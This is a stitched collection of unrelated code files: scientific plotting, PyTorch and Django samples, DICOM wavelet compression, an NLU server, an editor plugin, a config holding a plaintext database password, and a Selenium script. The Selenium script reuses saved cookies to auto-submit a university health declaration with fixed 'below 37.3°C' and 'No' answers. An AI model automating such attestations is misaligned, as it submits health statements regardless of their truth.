ax.xaxis.label.set_size(13.5)\n ax.yaxis.label.set_size(13.5)\n ax.set_xlim(0, xupperlim)\n ax.set_ylabel(r'Normalized pressure (mbar/p)')\n ax.semilogy()\n ax.set_ylim(5 * 10 ** -25, 2*10 ** -21)\n ax.set_xlabel(r'Beam Integral (C)')\n plt.legend(prop={'size':11.5})\n plt.show()\n\nprint(\"Plot 4a: Interconnect C-D norm pressure versus Beam Integral\")\nplt.figure(figsize=(18,6))\nplt.suptitle(titletextb1, fontsize=11,y=0.98)\nplt.title(titletextb2, fontsize=11, y=1.03)\n#plt.plot(beam_elapb1, normDb1, 'o-', color='blue', markersize=2, label='MKI2D')\nplt.plot(beam_intb1, normDCb1, 'o-', color='green', markersize=2, label='Interconnect MKI2D-MKI2C')\n#plt.plot(beam_elapb1, normQ5Db1, 'o-', color='purple', 
markersize=2, label='Interconnect Q5-MKI2D')\n#plt.plot(beam_elapb2, normDb2, 'o-', color='red', markersize=2, label='MKI8D')\nplt.plot(beam_intb2, normDCb2, 'o-', color='black', markersize=2, label='Interconnect MKI8D-MKI8C')\n#plt.plot(beam_elapb2, normQ5Db2, 'o-', color='orange', markersize=2, label='Interconnect MKI8D-Q5')\nax=plt.gca()\nplt.xticks(fontsize=12.5)\nplt.yticks(fontsize=13)\nax.yaxis.grid(linestyle='--') # plot horizontal lines\nax.xaxis.label.set_size(13.5)\nax.yaxis.label.set_size(13.5)\nax.set_xlim(0, xupperlim)\nax.set_ylabel(r'Normalized pressure (mbar/p)')\nax.semilogy()\nax.set_ylim(5 * 10 ** -25, 2*10 ** -21)\nax.set_xlabel(r'Beam Integral (C)')\nplt.legend(prop={'size':11.5})\nplt.show()\n\nprint(\"Plot 4b: Interconnect Q5-D norm pressure versus Beam Integral\")\nplt.figure(figsize=(18,6))\nplt.suptitle(titletextb1, fontsize=11,y=0.98)\nplt.title(titletextb2, fontsize=11, y=1.03)\n#plt.plot(beam_elapb1, normDb1, 'o-', color='blue', markersize=2, label='MKI2D')\n#plt.plot(beam_elapb1, normDCb1, 'o-', color='green', markersize=2, label='Interconnect MKI2D-MKI2C')\nplt.plot(beam_intb1, normQ5Db1, 'o-', color='purple', markersize=2, label='Interconnect Q5-MKI2D')\n#plt.plot(beam_elapb2, normDb2, 'o-', color='red', markersize=2, label='MKI8D')\n#plt.plot(beam_elapb2, normDCb2, 'o-', color='black', markersize=2, label='Interconnect MKI8D-MKI8C')\nplt.plot(beam_intb2, normQ5Db2, 'o-', color='orange', markersize=2, label='Interconnect Q5-MKI8D')\nax=plt.gca()\nplt.xticks(fontsize=12.5)\nplt.yticks(fontsize=13)\nax.yaxis.grid(linestyle='--') # plot horizontal lines\nax.xaxis.label.set_size(13.5)\nax.yaxis.label.set_size(13.5)\nax.set_xlim(0, xupperlim)\nax.set_ylabel(r'Normalized pressure (mbar/p)')\nax.semilogy()\nax.set_ylim(5 * 10 ** -25, 2*10 ** -21)\nax.set_xlabel(r'Beam Integral (C)')\nplt.legend(prop={'size':11.5})\nplt.show()\n\nif PlotVsTime == \"Y\":\n ##PLOT 3 B1 - MKI2 Pressure on various points and beam intensity \n print(\"Plot 5\")\n fig, ax1 = plt.subplots(figsize=(18,6))\n fig.suptitle(titletextb1)\n ax1.plot(aligned_timeb1, pressureDb1, 'o-', color='red', markersize=2, label='MKI2D')\n ax1.plot(aligned_timeb1, pressureDCb1, 'o-', color='magenta', markersize=2, label='Interconnect MKI2D-MKI2C')\n ax1.plot(aligned_timeb1, pressureQ5Db1, 'o-', color='blue', markersize=2, label='Interconnect Q5-MKI2D')\n ax1.set_ylabel(r'Pressure (mbar)')\n ax1.set_ylim(0, 1*10 ** -8)\n #ax1.plt.xticks(fontsize=12.5)\n #ax1.plt.yticks(fontsize=13)\n ax1.xaxis.label.set_size(13.5)\n ax1.yaxis.label.set_size(13.5)\n #ax1.set_ylim(10 ** -25, 2*10 ** -20)\n ax1.set_xlabel(r'Date & (UTC) time')\n pytimber.set_xaxis_date(bins=7)\n plt.legend(loc=2, prop={'size':11.5})\n \n ax2 = ax1.twinx()\n ax2.plot(aligned_timeb1, intensityb1, 'o-', color='green', markersize=2, label='Beam intensity B1')\n ax2.set_ylabel(r'Beam intensity (p)')\n #ax2.yaxis.label.set_size(13.5)\n ax2.tick_params(axis='y', colors='green')\n ax2.yaxis.label.set_color('green')\n ax2.set_ylim(0, 3.5*10 ** 14)\n plt.legend(prop={'size':11.5})\n plt.show()\n\n\nif PlotVsTime == \"Y\":\n ##PLOT 4 B2 - MKI8 Pressure on various points and beam intensity \n print(\"Plot 6\")\n fig, ax1 = plt.subplots(figsize=(18,6))\n fig.suptitle(titletextb2)\n ax1.plot(aligned_timeb2, pressureDb2, 'o-', color='red', markersize=2, label='MKI8D')\n ax1.plot(aligned_timeb2, pressureDCb2, 'o-', color='magenta', markersize=2, label='Interconnect MKI8C-MKI8D')\n ax1.plot(aligned_timeb2, pressureQ5Db2, 'o-', color='blue', markersize=2, 
label='Interconnect MKI8D-Q5')\n ax1.set_ylabel(r'Pressure (mbar)')\n ax1.set_ylim(0, 1*10 ** -8)\n #ax1.set_ylim(10 ** -25, 2*10 ** -20)\n ax1.set_xlabel(r'Date & (UTC) time')\n pytimber.set_xaxis_date(bins=7)\n plt.legend(loc=2, prop={'size':11.5})\n \n ax2 = ax1.twinx()\n ax2.plot(aligned_timeb2, intensityb2, 'o-', color='green', markersize=2, label='Beam intensity B2')\n ax2.set_ylabel(r'Beam intensity (p)')\n ax2.tick_params(axis='y', colors='green')\n ax2.yaxis.label.set_color('green')\n ax2.set_ylim(0, 3.5*10 ** 14)\n plt.legend()\n plt.show()\n\n\n#Plotting time\nplotting_time = time.time()-start_time\nprint(\"Execution time: plotting %0.3f seconds.\" % plotting_time)\n","sub_path":"Aga_vacuum_plots.py","file_name":"Aga_vacuum_plots.py","file_ext":"py","file_size_in_byte":26601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"72165363","text":"import os\nimport torch\n\nnet = torch.nn.Linear(3, 2)\nprint(net)\n\nprint(net(torch.tensor([1.0, 0.0, 0.0])))\n\nx_batch = torch.tensor([\n [1.0, 0., 0.],\n [0., 1.0, 0.],\n [0., 0., 1.0],\n [0., 0., 0.],\n])\n\nprint(net(x_batch))\n\nprint(\"weight is: \", net.weight)\nprint(\"bias is: \", net.bias)\n\nfor name, param in net.named_parameters():\n print(f'{name} = {param}\\n')\n\nfor k, v in net.state_dict().items():\n print(f'{k}: {v.type()}{tuple(v.shape)}')\n\ntorch.save(net.state_dict(), \"linear.pth\")\n\nnet.load_state_dict(torch.load(\"linear.pth\"))","sub_path":"pytorch/Basic/NN/linear.py","file_name":"linear.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"24531088","text":"import math\n\ndef checkPerfectNumber(num):\n \"\"\"\n :param num: int\n :return: bool\n \"\"\"\n acc = 0\n for i in range(1, int(math.sqrt(num)) + 1):\n if num % i == 0:\n acc += i + num / i\n return acc == num\n","sub_path":"normal/507_perfect_number.py","file_name":"507_perfect_number.py","file_ext":"py","file_size_in_byte":234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"528072258","text":"from django.http import HttpResponse\nfrom django.http import HttpResponseRedirect\nfrom django.http import HttpRequest\nfrom django.shortcuts import render\nfrom django.views import View\n\nline_of_cars = {\n \"change_oil\": [],\n \"inflate_tires\": [],\n \"diagnostic\": []\n}\nlast_processed_ticket = 0\n\n\nclass WelcomeView(View):\n @staticmethod\n def get(request, *args, **kwargs):\n return HttpResponse(\"
\n    Welcome to the Hypercar Service!\n
    \")\n\n\nclass MenuView(View):\n @staticmethod\n def get(request, *args, **kwargs):\n return render(request, \"tickets/menu.html\")\n\n\nclass ProcessingView(View):\n @staticmethod\n def get(request, *args, **kwargs):\n context = {\n \"change_oil_queue\": len(line_of_cars[\"change_oil\"]),\n \"inflate_tires_queue\": len(line_of_cars[\"inflate_tires\"]),\n \"diagnostic_queue\": len(line_of_cars[\"diagnostic\"]),\n }\n return render(request, \"tickets/processing.html\", context)\n\n @staticmethod\n def post(request, *args, **kwargs):\n if line_of_cars[\"change_oil\"]:\n ticket = line_of_cars[\"change_oil\"].pop(0)\n elif line_of_cars[\"inflate_tires\"]:\n ticket = line_of_cars[\"inflate_tires\"].pop(0)\n elif line_of_cars[\"diagnostic\"]:\n ticket = line_of_cars[\"diagnostic\"].pop(0)\n else:\n ticket = None\n\n global last_processed_ticket\n last_processed_ticket = ticket\n\n return HttpResponseRedirect(\"next\")\n\n\ndef next_ticket(request: HttpRequest) -> HttpResponse:\n return render(request, \"tickets/next.html\", context={\"ticket\": last_processed_ticket})\n\n\ndef change_oil(request: HttpRequest) -> HttpResponse:\n ticket_num = get_ticket_num()\n wait_time = len(line_of_cars[\"change_oil\"]) * 2\n context = {\n \"ticket_num\": ticket_num,\n \"wait_time\": wait_time\n }\n line_of_cars[\"change_oil\"].append(ticket_num)\n return render(request, \"tickets/ticket.html\", context)\n\n\ndef inflate_tires(request: HttpRequest) -> HttpResponse:\n ticket_num = get_ticket_num()\n wait_time = (len(line_of_cars[\"change_oil\"]) * 2) + \\\n (len(line_of_cars[\"inflate_tires\"]) * 5)\n context = {\n \"ticket_num\": ticket_num,\n \"wait_time\": wait_time\n }\n line_of_cars[\"inflate_tires\"].append(ticket_num)\n return render(request, \"tickets/ticket.html\", context)\n\n\ndef diagnostic(request: HttpRequest) -> HttpResponse:\n ticket_num = get_ticket_num()\n wait_time = (len(line_of_cars[\"change_oil\"]) * 2) + \\\n (len(line_of_cars[\"inflate_tires\"]) * 5) + \\\n (len(line_of_cars[\"diagnostic\"]) * 30)\n context = {\n \"ticket_num\": ticket_num,\n \"wait_time\": wait_time\n }\n line_of_cars[\"diagnostic\"].append(ticket_num)\n return render(request, \"tickets/ticket.html\", context)\n\n\ndef get_ticket_num() -> int:\n return len(line_of_cars[\"change_oil\"]) + \\\n len(line_of_cars[\"inflate_tires\"]) + \\\n len(line_of_cars[\"diagnostic\"]) + 1\n","sub_path":"tickets/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"206813977","text":"import data_coolection as cool\nimport h5py\nimport time\nimport matplotlib.pyplot as plt\n\n# Supress warnings from EPICS\ncool.hush()\nc = cool.Coolector(sample='Dummy',\n sample_uid='NA',\n location='Prototype lab',\n operator='Haavard',\n session='Heating M1 with mount in the prototype',\n description='Heating M1 with mount in the prototype',\n sub_experiment='NA',\n directory='/tmp/')\n# Add devices\ncam = cool.Manta_cam('CAM1', \"Nikkor 600, f4\", \"600\", \"8\", sw_trig=True,\n exposure=.22, gain=0, exposure_max=1.5)\nc.add_device(cam)\n\nprint('Added camera')\n# plt.ion()\n# plt.colorbar(0, 4096)\nfig = plt.figure()\n\n# # cam.auto_exposure()\n\ndef integrate_sq(image, minx, maxx, miny, maxy):\n width = image.shape[0]\n height = image.shape[1]\n # print(width, height)\n # val = 1000\n # for i in range(height):\n # for j in range(10):\n # image[minx+j, i] = val\n # image[maxx+j, i] = val\n # for i in range(width):\n # for j 
in range(10):\n # image[i, miny+j] = val\n # image[i, maxy+j] = val\n\n sum = 0\n for i in range(minx, maxx):\n for j in range(miny, maxy):\n sum += image[i, j]\n print(sum/((maxx - minx) * (maxy - miny)))\n ax = fig.add_subplot(111)\n ax.matshow(image)\n plt.draw()\n plt.pause(1)\n\n\nwith c:\n while(True):\n # print('Trigger!')\n c.sw_trigger()\n c.wait_for_data()\n with h5py.File(c.latest_file_name, 'r') as f:\n image = f.get(cam.savedata.groupname + 'data')[:]\n integrate_sq(image, 400, 500, 250, 350)\n time.sleep(0.5)\n","sub_path":"continous-plotting.py","file_name":"continous-plotting.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"643691282","text":"from unittest import TestCase\nfrom update_file import student_exist\nfrom unittest.mock import patch, mock_open\nfrom student import Student\n\n\nclass TestStudentExist(TestCase):\n @patch(\"class_list.file_read\",\n return_value=[Student(\"May\", \"Chau\", \"A01080616\", True, []),\n Student(\"Amy\", \"Chau\", \"A00000001\", False, [])])\n def test_student_exist_true(self, mock_file):\n self.assertTrue(student_exist(\"A00000001\", 'student.txt'))\n\n @patch(\"class_list.file_read\",\n return_value=[Student(\"May\", \"Chau\", \"A01080616\", True, []),\n Student(\"Amy\", \"Chau\", \"A00000001\", False, [])])\n def test_student_exist_false(self, mock_file):\n self.assertFalse(student_exist(\"A00000003\", 'student.txt'))\n\n @patch(\"class_list.file_read\", side_effect=FileNotFoundError)\n def test_student_exist_file_not_exist(self, mock_file):\n self.assertFalse(student_exist(\"A00000002\", 'student.txt'))\n\n","sub_path":"CRUD/test_student_exist.py","file_name":"test_student_exist.py","file_ext":"py","file_size_in_byte":970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"207727597","text":"from flask_restful import Resource\nfrom flask import request\nfrom models.response import CustomResponse\nfrom models.status import Status\nimport config\nfrom utilities.utils import FileUtilities\nfrom services import DocumentExporterService\nfrom utilities import MODULE_CONTEXT\nfrom anuvaad_auditor.loghandler import log_info, log_exception\nfrom common.errors import ServiceError,DataEmptyError\nfrom common.errors import InternalServerError\n\nfile_ops = FileUtilities()\nexportService=DocumentExporterService()\n\nclass DocumentExporterResource(Resource):\n\n def post(self):\n body = request.get_json()\n log_info(\"request received\", MODULE_CONTEXT)\n try:\n if 'record_id' not in body or not body['record_id'] or 'user_id' not in body or not body['user_id'] or 'file_type' not in body or not body['file_type']:\n res = CustomResponse(Status.ERR_GLOBAL_MISSING_PARAMETERS.value,None)\n return res.getresjson(), 400\n record_id = body['record_id']\n user_id = body['user_id']\n file_type = body['file_type']\n\n log_info(\"DocumentExporterResource request received | {}\".format(body),MODULE_CONTEXT)\n\n formated_document = exportService.export_document(record_id, user_id, file_type)\n if formated_document ==False:\n log_info(\"Error occured at resource level due to service operation\", MODULE_CONTEXT)\n res = CustomResponse(Status.DATA_NOT_FOUND.value,None)\n return res.getresjson(), 400\n\n log_info(\"document type %s saved successfully\"%file_type, MODULE_CONTEXT)\n res = CustomResponse(Status.SUCCESS.value, formated_document)\n return res.getres()\n except ServiceError as e:\n log_exception(\"Error 
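integrate_sq above averages a rectangular region of the camera image with two nested Python loops; NumPy slicing returns the same number in one expression. A minimal sketch:

import numpy as np

def roi_mean(image, minx, maxx, miny, maxy):
    # equals sum / ((maxx - minx) * (maxy - miny)) from integrate_sq
    return float(np.asarray(image)[minx:maxx, miny:maxy].mean())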
occured at resource level due to service operation\", MODULE_CONTEXT, e)\n res = CustomResponse(Status.OPERATION_NOT_PERMITTED.value,None)\n return res.getresjson(), 400\n except Exception as e:\n log_exception(\"Error occured at resource level due to {}\".format(str(e)), MODULE_CONTEXT, e)\n res = CustomResponse(Status.OPERATION_NOT_PERMITTED.value,None)\n return res.getresjson(), 400","sub_path":"anuvaad-etl/anuvaad-extractor/document-converter/src/resources/export_doc.py","file_name":"export_doc.py","file_ext":"py","file_size_in_byte":2242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"401266741","text":"import numpy as np\nimport cv2\nfrom skimage import exposure\nimport pydicom as dicom\nimport pylab as pl\nfrom PIL.Image import fromarray\nfrom PIL import Image\nimport pylibjpeg\nimport scipy.signal as scs\nimport sys\nimport matplotlib.path as mplPath\nimport scipy.misc\nimport random\nimport string\nimport os\ndef get_random_string():\n result_str = ''.join(random.choice(string.ascii_letters) for i in range(12))\n return result_str\n\n\ndef get_compression_image(name):\n\n d = dicom.dcmread(name)\n f = open(get_random_string() + '.txt', 'w')\n\n print(str(d))\n f.write(str(d))\n\n gray = d.pixel_array\n gray[gray < 300] = 0\n gray = (gray/3377)\n gray[gray > 1.0] = 1\n\n gray = gray * 255\n cv2.imshow('ttttt1', np.uint8(gray))\n path = 'SavedFiles/' + get_random_string() + '.jpg'\n cv2.imwrite(path, np.uint8(wavelet(gray)[0]))\n\n return path\n\ndef get_original_image(name):\n\n d = dicom.dcmread(name)\n f = open('test1.txt', 'a')\n\n f.write(str(d))\n\n gray = d.pixel_array\n gray[gray < 300] = 0\n gray = (gray/3377)\n gray[gray > 1.0] = 1\n\n gray = gray * 255\n path = 'SavedFiles/' + get_random_string() + '.jpg'\n cv2.imwrite(path, np.uint8(gray))\n\n return path\n\ndef get_wavelet(name):\n\n d = dicom.dcmread(name)\n f = open('test1.txt', 'a')\n\n f.write(str(d))\n\n gray = d.pixel_array\n gray[gray < 300] = 0\n gray = (gray/3377)\n gray[gray > 1.0] = 1\n\n gray = gray * 255\n\n\n return wavelet(gray)\n\n# Array = np.zeros((int(d.Rows), int(d.Columns)), dtype=d.pixel_array.dtype)\n# cv2.imwrite(\"SavedFiles/original.jpg\", d.pixel_array)\n# print(Array.shape)\n#\n# Array[:,:] = d.pixel_array / 128\n#\n# Array[Array > 256] = 0\n#\n# Array = Array * 128\n#\n#\n# gray = Array\n\n\n\n# image = cv2.imread('0004.jpg')\n# gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)#\n# print(np.max(gray))\n#t = ycbcr(image)\n\n# print(t[0])\n\n\n# arr = np.array([[13,12,16,15], [15,14,11,19],[12,13,18,15], [11,14,17,16]])\n\n\n\ndef wavelet(arr):\n WL = []\n WH = []\n arr = np.int16(arr)\n\n for i in range(arr.shape[0]):\n temp = []\n for j in range(0, arr.shape[1], 2):\n temp.append((arr[i][j] + arr[i][j + 1]) / 2.)\n WL.append(temp)\n\n\n for i in range(arr.shape[0]):\n temp = []\n for j in range(0, arr.shape[1], 2):\n temp.append((arr[i][j] - arr[i][j + 1]) / 2.)\n WH.append(temp)\n\n WLL = []\n WLH = []\n\n for i in range(0, len(WL), 2):\n temp = []\n for j in range(len(WL[0])):\n temp.append((WL[i][j] + WL[i + 1][j]) / 2.)\n WLL.append(temp)\n # print(len(WLL))\n\n for i in range(0, len(WL), 2):\n temp = []\n for j in range(len(WL[0])):\n temp.append((WL[i][j] - WL[i + 1][j]) / 2.)\n WLH.append(temp)\n\n WHL = []\n WHH = []\n\n for i in range(0, len(WH), 2):\n temp = []\n for j in range(len(WH[0])):\n temp.append((WH[i][j] + WH[i + 1][j]) / 2.)\n WHL.append(temp)\n\n for i in range(0, len(WH), 2):\n temp = []\n for j in 
range(len(WH[0])):\n temp.append((WH[i][j] - WH[i + 1][j]) / 2.)\n WHH.append(temp)\n return WLL, WLH, WHL, WHH\n\n# function dekomprimering(WLL, WLH, WHL, WHH){\n# let WL = [];\n# for(let i=0; i HTTPResponse:\n \"\"\"\n\n :return:\n \"\"\"\n try:\n querys = request.json[\"querys\"]\n result = json.loads(ip.app(querys))\n localtime = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n res_dic = {\n \"result\": result,\n \"time\": localtime\n }\n log_res = json.dumps(res_dic, ensure_ascii=False)\n logger.info(log_res)\n return response.json(res_dic)\n except Exception as e:\n logger.info(e)\n\n\n@app.post('model/parse')\nasync def nlu_predict(request: Request) -> HTTPResponse:\n \"\"\"\n nlu接口, intent + slot拼装返回\n 返回的数据结构见resource/nlu输出数据结构.json\n :param request:\n :return:\n \"\"\"\n try:\n querys = request.json[\"text\"]\n result = json.loads(ip.app([querys]))\n entities = get_slot_result(querys)\n localtime = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n res_dic = {\n \"intent\": result['intents'][0],\n \"intent_ranking\": result['intents'],\n \"entities\": entities\n }\n log_res = json.dumps(res_dic, ensure_ascii=False)\n logger.info(log_res)\n return response.json(res_dic)\n except Exception as e:\n logger.info(e)\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=9016, auto_reload=True)\n","sub_path":"server/run_server.py","file_name":"run_server.py","file_ext":"py","file_size_in_byte":2213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"513913972","text":"#-*- coding: utf-8 -*-\n# stino/stpanel.py\n\nimport sublime\nimport threading\nimport time\n\ndef isPanel(view):\n\tstate = True\n\tfile_name = view.file_name()\n\tname = view.name()\n\tif file_name or name:\n\t\tstate = False\n\treturn state\n\nclass STPanel:\n\tdef __init__(self, name = 'stino_log'):\n\t\tself.name = name\n\t\tself.show_text = ''\n\t\twindow = sublime.active_window()\n\t\tif not (window is None):\n\t\t\tself.panel = window.get_output_panel(self.name)\n\t\telse:\n\t\t\tself.panel = None\n\n\tdef addText(self, text):\n\t\tif self.panel is None:\n\t\t\twindow = sublime.active_window()\n\t\t\tif not (window is None):\n\t\t\t\tself.panel = window.get_output_panel(self.name)\n\t\tif not (self.panel is None):\n\t\t\tself.show_text += text\n\t\t\tshow_thread = threading.Thread(target=self.show)\n\t\t\tshow_thread.start()\n\n\tdef show(self):\n\t\tsublime.set_timeout(self.update, 0)\n\n\tdef update(self):\n\t\tif self.show_text:\n\t\t\tpanel_edit = self.panel.begin_edit()\n\t\t\tself.panel.insert(panel_edit, self.panel.size(), self.show_text)\n\t\t\tself.panel.end_edit(panel_edit)\n\t\t\tself.panel.show(self.panel.size())\n\t\t\tself.show_text = ''\n\n\t\t\twindow = sublime.active_window()\n\t\t\tpanel_name = 'output.' 
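wavelet() above is one level of a Haar decomposition: pairwise averages and differences taken first along each row, then down the columns, producing the WLL/WLH/WHL/WHH quarter-bands; the commented-out JavaScript sketches the matching decompression. Because averages plus differences recover both original values exactly, the inverse is lossless. A hedged NumPy sketch of that inverse:

import numpy as np

def inverse_haar(WLL, WLH, WHL, WHH):
    WLL, WLH, WHL, WHH = map(np.asarray, (WLL, WLH, WHL, WHH))
    rows, cols = WLL.shape
    # undo the row-pairing step: WL[2i] = WLL + WLH, WL[2i+1] = WLL - WLH
    WL = np.empty((2 * rows, cols))
    WH = np.empty((2 * rows, cols))
    WL[0::2], WL[1::2] = WLL + WLH, WLL - WLH
    WH[0::2], WH[1::2] = WHL + WHH, WHL - WHH
    # undo the column-pairing step: a[i, 2j] = WL + WH, a[i, 2j+1] = WL - WH
    out = np.empty((2 * rows, 2 * cols))
    out[:, 0::2], out[:, 1::2] = WL + WH, WL - WH
    return out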
+ self.name\n\t\t\twindow.run_command(\"show_panel\", {\"panel\": panel_name})\n\n\tdef clear(self):\n\t\tpanel_edit = self.panel.begin_edit()\n\t\tself.panel.replace(panel_edit, sublime.Region(0, self.panel.size()), '')\n\t\tself.panel.end_edit(panel_edit)\n\n\tdef toggleWordWrap(self):\n\t\tself.panel.run_command('toggle_setting', {'setting': 'word_wrap'})\n\nclass MonitorView:\n\tdef __init__(self, name = 'Serial Monitor - Serial Port'):\n\t\tself.name = name\n\t\tself.show_text = ''\n\t\tself.window = sublime.active_window()\n\t\tif not (self.window is None):\n\t\t\tself.view = self.findInOpendView(self.name)\n\t\t\tif self.view is None:\n\t\t\t\tself.view = self.window.new_file()\n\t\t\t\tself.view.set_name(self.name)\n\t\telse:\n\t\t\tself.view = None\n\n\tdef findInOpendView(self, view_name):\n\t\topened_view = None\n\t\tfound = False\n\t\twindows = sublime.windows()\n\t\tfor window in windows:\n\t\t\tviews = window.views()\n\t\t\tfor view in views:\n\t\t\t\tname = view.name()\n\t\t\t\tif name == view_name:\n\t\t\t\t\topened_view = view\n\t\t\t\t\tfound = True\n\t\t\t\t\tbreak\n\t\t\tif found:\n\t\t\t\tbreak\n\t\treturn opened_view\n\n\tdef addText(self, text):\n\t\tif self.view is None:\n\t\t\tself.window = sublime.active_window()\n\t\t\tif not (self.window is None):\n\t\t\t\tself.view = self.findInOpendView(self.name)\n\t\t\t\tif self.view is None:\n\t\t\t\t\tself.view = self.window.new_file()\n\t\t\t\t\tself.view.set_name(self.name)\n\t\tif not (self.view is None):\n\t\t\tself.show_text += text\n\t\t\tshwo_thread = threading.Thread(target=self.show)\n\t\t\tshwo_thread.start()\n\n\tdef show(self):\n\t\tsublime.set_timeout(self.update, 0)\n\n\tdef update(self):\n\t\tif self.show_text:\n\t\t\tview_edit = self.view.begin_edit()\n\t\t\tself.view.insert(view_edit, self.view.size(), self.show_text)\n\t\t\tself.view.end_edit(view_edit)\n\t\t\tself.view.show(self.view.size())\n\t\t\tself.show_text = ''\n\n\tdef raiseToFront(self):\n\t\tself.window.focus_view(self.view)\n\n\tdef toggleWordWrap(self):\n\t\tself.view.run_command('toggle_setting', {'setting': 'word_wrap'})\n","sub_path":"Lib/Sublime Text 2/sublime-text-2/Backup/20140109131440/Arduino-like IDE/stino/stpanel.py","file_name":"stpanel.py","file_ext":"py","file_size_in_byte":3010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"385025928","text":"#!/usr/bin/python\n\nclass CONST:\n WORKER_HOST_ADDR = \"10.5.4.26\"\n WORKER_HOST_PORT = 8013\n WORKER_ID = \"0\"\n DB_HOST = \"10.5.2.22\"\n DB_USERNAME = \"bridge\"\n DB_PASSWORD = \"12345678\"\n DB_DATABASE = \"Bridge\"\n\n DB_OVERHEAD_TBL = 'overHead'\n DB_TASKID_TBL = 'taskIDInfo'\n DB_IDSEED_TBL = 'idSeed'\n\n DB_TABLES_OVERHEAD = (\n \"CREATE TABLE overHead (\"\n \" ID INT NOT NULL,\"\n \" STATE VARCHAR(5) NOT NULL,\"\n \" PRIMARY KEY (ID))\"\n )\n\n DB_TABLES_TASKINFO = (\n \"CREATE TABLE taskIDInfo (\"\n \" WORKER_ID INT NOT NULL,\"\n \" MAX INT NOT NULL,\"\n \" inProc INT NOT NULL,\"\n \" pending INT NOT NULL,\"\n \" PRIMARY KEY (wID))\"\n )\n\n DB_TABLES_IDSEED = (\n \"CREATE TABLE idSeed (\" \n \" seed INT NOT NULL\"\n \")\"\n )\n\n WORKING_DIR = \"E:/WORKING_DIR/\"\n PROJECT_NAME = \"OT6800\"\n\n COMPILE_ROOT = \"./gbn/src\"\n COMPILE_COMMAND = [\n \".\\\\TiNetS8600_build_bootrom.bat 1\",\n \".\\\\TiNetS8600_build_host.bat 1\"\n ]\n\n RESULT_FILES = [\n # ControlBoard \n [\"boot/config/OT6800_CONTROL_BSP/image/\", \"bootrom_flash.bin\", \"host.arj\"]\n ]\n\n COMPRESS_FILE_NAME = \"COMPRESS.zip\"\n\n 
COMPILE_INFO_TRANSFER_BYTES = 4096\n","sub_path":"server-side/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"311838455","text":"#!/usr/bin/python\nimport mmap\nimport os\n\ncount = 0\nwith open('/tmp/kdd99extractor_connection_queue.bin', 'r+b') as file:\n mm = mmap.mmap(file.fileno(), 0)\n try:\n while True:\n try:\n flag = mm.read(1)\n if flag[0] != 0:\n mm.seek(-1, os.SEEK_CUR)\n mm.write_byte(0)\n data = mm.read(255)\n count += 1\n print(data.decode('unicode_escape'))\n else:\n mm.seek(-1, os.SEEK_CUR)\n except IndexError:\n mm.seek(0)\n except KeyboardInterrupt:\n print(count)\n mm.close()\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"330894887","text":"import pickle\n\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.support.ui import WebDriverWait\n\nfrom settings import *\n\n\nclass Browser:\n APP_URL = 'https://xmuxg.xmu.edu.cn/app/214'\n LOGIN_URL = 'http://xmuxg.xmu.edu.cn/xmu/app/214'\n chrome_option = Options()\n chrome_option.add_argument('--disable-extensions')\n chrome_option.add_experimental_option(\"debuggerAddress\", \"127.0.0.1:9222\")\n\n def __init__(self):\n self.driver = webdriver.Chrome(executable_path='driver/chromedriver.exe')\n\n def login(self):\n self.driver.get(self.LOGIN_URL)\n print('登陆过期,请登陆你的账号。')\n input('登录之后请在该窗口输入回车。')\n cookies = self.driver.get_cookies()\n pickle.dump(cookies, open('cookies.txt', 'wb'))\n\n def load_cookie(self):\n try:\n self.driver.get(self.APP_URL)\n cookies = pickle.load(open('cookies.txt', 'rb'))\n for cookie in cookies:\n if 'expiry' in cookie:\n del cookie['expiry']\n self.driver.add_cookie(cookie)\n self.driver.get(self.APP_URL)\n print(\"cookie loaded\")\n except Exception as e:\n print(\"ERROR:\")\n print(e)\n print(\"---------\")\n\n def wait_an_element_by_xpath(self, xpath):\n try:\n element = WebDriverWait(self.driver, LOAD_TIME).until(\n lambda driver: driver.find_element_by_xpath(xpath)\n )\n return element\n except Exception as e:\n print(\"连接超时。如要设置更长的等待时间,请打开 settings.py 文件,修改LOAD_TIME为更大值(单位:秒)\")\n print(\"ERROR:\")\n print(e)\n print(\"---------\")\n exit(1)\n\n def fill(self):\n self.wait_an_element_by_xpath(\"//div[@title='我的表单']\").click()\n if self.wait_an_element_by_xpath(\"//div[@data-name='select_1582538796361']//span[1]\").text != '37.3以下 Below 37.3 degree celsius':\n self.wait_an_element_by_xpath(\"//div[@data-name='select_1582538796361']\").click()\n self.wait_an_element_by_xpath(\"//label[@title='37.3以下 Below 37.3 degree celsius']\").click()\n if self.wait_an_element_by_xpath(\"//div[@data-name='select_1582538846920']//span[1]\").text != '否 No':\n self.wait_an_element_by_xpath(\"//div[@data-name='select_1582538846920']\").click()\n self.wait_an_element_by_xpath(\"//label[@title='否 No']\").click()\n if self.wait_an_element_by_xpath(\"//div[@data-name='select_1582538939790']//span[1]\").text != '是 